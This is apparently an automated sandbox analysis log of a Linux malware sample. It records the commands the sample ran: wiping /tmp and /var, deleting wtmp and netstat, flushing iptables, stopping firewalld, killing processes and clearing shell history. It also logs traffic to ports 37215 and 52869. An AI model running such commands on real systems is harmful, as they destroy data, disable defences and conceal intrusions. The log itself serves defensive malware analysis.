Source: /bin/sh (PID: 5437) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nvidia[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf Jump to behavior
Source: /bin/sh (PID: 5439) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nvidia[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf Jump to behavior
Source: /bin/sh (PID: 5441) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*radeon[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf Jump to behavior
Source: /bin/sh (PID: 5443) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*radeon[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf Jump to behavior
Source: /bin/sh (PID: 5445) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*amdgpu[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf Jump to behavior
Source: /bin/sh (PID: 5447) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*amdgpu[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf Jump to behavior
Source: /bin/sh (PID: 5452) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nouveau[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf Jump to behavior
Source: /bin/sh (PID: 5454) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nouveau[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf Jump to behavior
Source: /bin/sh (PID: 5555) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nvidia[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf Jump to behavior
Source: /bin/sh (PID: 5557) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nvidia[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf Jump to behavior
Source: /bin/sh (PID: 5559) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*radeon[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf Jump to behavior
Source: /bin/sh (PID: 5561) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*radeon[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf Jump to behavior
Source: /bin/sh (PID: 5563) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*amdgpu[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf Jump to behavior
Source: /bin/sh (PID: 5565) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*amdgpu[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf Jump to behavior
Source: /bin/sh (PID: 5567) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nouveau[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf Jump to behavior
Source: /bin/sh (PID: 5569) Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nouveau[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf Jump to behavior
Enumerates processes within the "proc" file system
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/5146/status Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/5146/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/1582/status Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/1582/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/3088/status Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/3088/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/230/status Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/230/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/110/status Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/110/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/231/status Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/231/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/111/status Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/111/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/232/status Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/232/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/1579/status Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/1579/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/112/status Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/112/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/233/status Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/233/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/1699/status Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/1699/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/113/status Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/113/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/234/status Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/234/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/1335/status Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/1335/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/1698/status Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/1698/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/114/status Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/114/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/235/status Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/235/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/1334/status Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/1334/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/1576/status Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/1576/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/2302/status Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/2302/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/115/status Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/115/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/236/status Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/236/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/116/status Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/116/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/237/status Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/237/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/117/status Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/117/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/118/status Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/118/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/910/status Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/910/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/119/status Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/119/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/912/status Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/912/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/10/status Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/10/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/2307/status Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/2307/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/11/status Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/11/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/918/status Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/918/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/12/status Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/12/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/13/status Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/13/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/5274/status Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/5274/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/14/status Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/14/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/5154/status Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/5154/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/15/status Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/15/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/16/status Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/16/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/5156/status Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/5156/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/17/status Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/17/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/18/status Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/18/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/1594/status Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/1594/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/120/status Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/120/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/121/status Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/121/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/1349/status Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/1349/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/1/status Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/1/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/122/status Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/122/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/243/status Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/243/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/123/status Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/123/cmdline Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/2/status Jump to behavior
Source: /usr/bin/pkill (PID: 5284) File opened: /proc/2/cmdline Jump to behavior
Creates hidden files and/or directories
Source: /usr/bin/whoopsie (PID: 5337) Directory: /nonexistent/.cache Jump to behavior
Executes the "iptables" command used for managing IP filtering and manipulation
Source: /bin/sh (PID: 5301) Iptables executable: /sbin/iptables -> /sbin/iptables -F Jump to behavior
Source: /bin/sh (PID: 5302) Iptables executable: /sbin/iptables -> /sbin/iptables -X Jump to behavior
Sample tries to set the executable flag
Source: /usr/bin/whoopsie (PID: 5337) File: /var/crash (bits: gv usr: rwx grp: rwx all: rwx) Jump to behavior
Source: /usr/sbin/gdm3 (PID: 5502) File: /var/run/gdm3 (bits: - usr: -x grp: x all: rwx) Jump to behavior
Source: /usr/sbin/gdm3 (PID: 5502) File: /var/log/gdm3 (bits: - usr: -x grp: x all: rwx) Jump to behavior
Source: /usr/sbin/gdm3 (PID: 5582) File: /var/run/gdm3 (bits: - usr: -x grp: x all: rwx) Jump to behavior
Source: /usr/sbin/gdm3 (PID: 5582) File: /var/log/gdm3 (bits: - usr: -x grp: x all: rwx) Jump to behavior
Executes commands using a shell command-line interpreter
Source: /tmp/x86 (PID: 5256) Shell command executed: sh -c "rm -rf /tmp/* /var/* /var/run/* /var/tmp/*" Jump to behavior
Source: /tmp/x86 (PID: 5265) Shell command executed: sh -c "rm -rf /var/log/wtmp" Jump to behavior
Source: /tmp/x86 (PID: 5267) Shell command executed: sh -c "rm -rf /tmp/*" Jump to behavior
Source: /tmp/x86 (PID: 5269) Shell command executed: sh -c "rm -rf /bin/netstat" Jump to behavior
Source: /tmp/x86 (PID: 5271) Shell command executed: sh -c "iptables -F" Jump to behavior
Source: /tmp/x86 (PID: 5276) Shell command executed: sh -c "pkill -9 busybox" Jump to behavior
Source: /tmp/x86 (PID: 5283) Shell command executed: sh -c "pkill -9 perl" Jump to behavior
Source: /tmp/x86 (PID: 5285) Shell command executed: sh -c "pkill -9 python" Jump to behavior
Source: /tmp/x86 (PID: 5289) Shell command executed: sh -c "service iptables stop" Jump to behavior
Source: /tmp/x86 (PID: 5300) Shell command executed: sh -c "/sbin/iptables -F; /sbin/iptables -X" Jump to behavior
Source: /tmp/x86 (PID: 5303) Shell command executed: sh -c "service firewalld stop" Jump to behavior
Source: /tmp/x86 (PID: 5311) Shell command executed: sh -c "rm -rf ~/.bash_history" Jump to behavior
Source: /tmp/x86 (PID: 5313) Shell command executed: sh -c "history -c" Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5436) Shell command executed: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /etc/modprobe.d/*.conf" Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5438) Shell command executed: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /lib/modprobe.d/*.conf" Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5440) Shell command executed: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /etc/modprobe.d/*.conf" Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5442) Shell command executed: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /lib/modprobe.d/*.conf" Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5444) Shell command executed: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /etc/modprobe.d/*.conf" Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5446) Shell command executed: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /lib/modprobe.d/*.conf" Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5451) Shell command executed: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /etc/modprobe.d/*.conf" Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5453) Shell command executed: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /lib/modprobe.d/*.conf" Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5554) Shell command executed: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /etc/modprobe.d/*.conf" Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5556) Shell command executed: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /lib/modprobe.d/*.conf" Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5558) Shell command executed: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /etc/modprobe.d/*.conf" Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5560) Shell command executed: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /lib/modprobe.d/*.conf" Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5562) Shell command executed: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /etc/modprobe.d/*.conf" Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5564) Shell command executed: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /lib/modprobe.d/*.conf" Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5566) Shell command executed: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /etc/modprobe.d/*.conf" Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5568) Shell command executed: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /lib/modprobe.d/*.conf" Jump to behavior
Executes the "rm" command used to delete files or directories
Source: /bin/sh (PID: 5257) Rm executable: /usr/bin/rm -> rm -rf /tmp/config-err-dHT8bZ /tmp/dmesgtail.log /tmp/snap.lxd /tmp/ssh-hOQ5FjG2iVgO /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-ModemManager.service-c4RYFi /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-colord.service-gKIF8e /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-fwupd.service-gB0a9f /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-switcheroo-control.service-APWnLg /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-logind.service-IofUpj /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-resolved.service-AfPZzg /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-upower.service-x0xO0i /tmp/vmware-root_721-4290559889 /tmp/x86 /var/backups /var/cache /var/crash /var/lib /var/local /var/lock /var/log /var/mail /var/metrics /var/opt /var/run /var/snap /var/spool /var/tmp /var/run/NetworkManager /var/run/acpid.pid /var/run/acpid.socket /var/run/apport.lock /var/run/avahi-daemon /var/run/blkid /var/run/cloud-init /var/run/console-setup /var/run/crond.pid /var/run/crond.reboot /var/run/cryptsetup /var/run/cups /var/run/dbus /var/run/dmeventd-client /var/run/dmeventd-server /var/run/gdm3 /var/run/gdm3.pid /var/run/initctl /var/run/initramfs /var/run/irqbalance /var/run/lock /var/run/log /var/run/lvm /var/run/mlocate.daily.lock /var/run/mono-xsp4 /var/run/mono-xsp4.pid /var/run/motd.d /var/run/mount /var/run/multipathd.pid /var/run/netns /var/run/network /var/run/screen /var/run/sendsigs.omit.d /var/run/shm /var/run/snapd /var/run/snapd-snap.socket /var/run/snapd.socket /var/run/speech-dispatcher /var/run/spice-vdagentd /var/run/sshd /var/run/sshd.pid /var/run/sudo /var/run/systemd /var/run/tmpfiles.d /var/run/udev /var/run/udisks2 /var/run/unattended-upgrades.lock /var/run/user /var/run/utmp /var/run/uuidd /var/run/vmware /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-ModemManager.service-J6Q1Te /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-colord.service-srP90f /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-fwupd.service-biJ0Gi /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-switcheroo-control.service-1jIxdj /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-logind.service-llmWag /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-resolved.service-X16eHh /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-upower.service-GpSnaf Jump to behavior
Source: /bin/sh (PID: 5266) Rm executable: /usr/bin/rm -> rm -rf /var/log/wtmp Jump to behavior
Source: /bin/sh (PID: 5268) Rm executable: /usr/bin/rm -> rm -rf /tmp/* Jump to behavior
Source: /bin/sh (PID: 5270) Rm executable: /usr/bin/rm -> rm -rf /bin/netstat Jump to behavior
Source: /bin/sh (PID: 5312) Rm executable: /usr/bin/rm -> rm -rf /root/.bash_history Jump to behavior
Source: /usr/bin/gpu-manager (PID: 5553) Log file created: /var/log/gpu-manager.log Jump to dropped file
Source: /usr/sbin/service (PID: 5297) Sed executable: /usr/bin/sed -> sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p Jump to behavior
Source: /usr/sbin/service (PID: 5310) Sed executable: /usr/bin/sed -> sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p Jump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Sample deletes itself
Source: /usr/bin/rm (PID: 5257) File: /tmp/x86 Jump to behavior
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 55398 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 57708 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 50586 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 33754 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 60950 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 23 -> 17012
Source: unknown Network traffic detected: HTTP traffic on port 33754 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 38424 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 33754 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 57248 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 40048 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 38424 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 33754 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 37264 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 40048 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37264 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 58332 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 32874 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60672 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37264 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 38424 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 32874 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60672 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 33754 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 32874 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60672 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 36250 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 40048 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37264 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50732 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 60238 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 36250 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 50732 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 60238 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 36250 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 32874 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50732 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 60672 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60238 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 35894 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 54748 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 47428 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 50732 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 35894 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 36250 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 54748 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60238 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 37264 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 35894 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 54748 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 45364 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 38424 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 59078 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 50732 -> 37215
Source: unknown Network traffic detected: HTTP traffic on port 32874 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60672 -> 52869
Source: unknown Network traffic detected: HTTP traffic on port 60238 -> 52869
